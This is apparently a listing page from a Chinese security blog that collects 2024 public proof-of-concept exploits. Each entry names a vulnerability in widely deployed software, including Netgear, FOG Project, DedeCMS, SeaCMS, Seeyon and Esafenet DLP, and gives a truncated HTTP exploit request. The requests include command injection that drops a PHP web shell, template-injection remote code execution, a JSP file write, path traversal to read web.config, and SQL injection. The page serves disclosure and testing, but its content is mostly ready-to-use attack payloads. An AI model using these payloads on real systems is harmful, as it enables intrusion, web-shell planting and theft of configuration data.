2024你懂的 第21页
2024攻防互联网公开POC
泛微E-office-10接口leave_record.php存在SQL注入漏洞_秃兔安全
Netgear-WN604接口downloadFile.php信息泄露漏洞_秃兔安全

Netgear-WN604接口downloadFile.php信息泄露漏洞

GET /downloadFile.php?file=config HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Accept...
秃兔的头像_秃兔安全至尊玉兔秃兔6个月前
0868
fogproject系统接口export.php存在远程命令执行漏洞_秃兔安全

fogproject系统接口export.php存在远程命令执行漏洞

POST /fog/management/export.php?filename=$(echo+'<?php+echo+shell_exec($_GET[‘”‘cmd'”‘]);+?>’+>+lol.php)&type=pdf HTTP/1.1Host: 192.168.15.5Content-Length: 21Use...
秃兔的头像_秃兔安全至尊玉兔秃兔6个月前
0515
海洋CMS后台admin_smtp.php存在远程代码执行漏洞_秃兔安全

海洋CMS后台admin_smtp.php存在远程代码执行漏洞

POST /at1fcg/admin_smtp.php?action=set HTTP/1.1Host: 127.0.0.12User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0Accept: text/html,applica...
秃兔的头像_秃兔安全至尊玉兔秃兔6个月前
07910
DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞_秃兔安全

DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞

GET /dede/sys_verifies.php?action=getfiles&refiles[]=123${${print%20whoami}} HTTP/1.1Host: 127.0.0.11User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100...
秃兔的头像_秃兔安全至尊玉兔秃兔6个月前
05215
DedeCMSV5.7.114后台article_template_rand.php存在远程代码执行漏洞_秃兔安全

DedeCMSV5.7.114后台article_template_rand.php存在远程代码执行漏洞

POST /dede/article_template_rand.php HTTP/1.1Host: 127.0.0.11User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0Accept: text/html,applicati...
秃兔的头像_秃兔安全至尊玉兔秃兔6个月前
07310
福建科立讯通信 指挥调度管理平台 ajax users.php SQL 注入漏洞_秃兔安全

福建科立讯通信 指挥调度管理平台 ajax users.php SQL 注入漏洞

POST /app/ext/ajax users.php HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64
秃兔的头像_秃兔安全至尊玉兔秃兔6个月前
0835
天问物业 ERP 系统 AreaAvatarDownLoad.aspx 任意文件读取漏洞_秃兔安全

天问物业 ERP 系统 AreaAvatarDownLoad.aspx 任意文件读取漏洞

GET /HM/ Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config HTTP/1.1Host: xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firef...
秃兔的头像_秃兔安全至尊玉兔秃兔6个月前
0646
致远在野constDef接囗存在代码执行漏洞_秃兔安全

致远在野constDef接囗存在代码执行漏洞

GET /seeyon/constDefdo?method=newConstDef&constKey=asdasd&constDefine=$demo%20%22;new%20File(%22./webapps/ROOT/1111.jsp%22).write(new%20String(Base64.getDecoder0.decode%22P...
秃兔的头像_秃兔安全至尊玉兔秃兔6个月前
07413
亿赛通数据泄露防护(DLP)系统 NetSecConfigAjax SQL 注入漏洞_秃兔安全

亿赛通数据泄露防护(DLP)系统 NetSecConfigAjax SQL 注入漏洞

POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1Host:Cookie: JSESSIONID=99CEC1B294F4EEEA7AFC46D8D4741917:JSESSIONID=06DCD58EDC037F785605A29CD7425C66Cache-Control: max-age=0Sec-Ch...
秃兔的头像_秃兔安全至尊玉兔秃兔6个月前
07410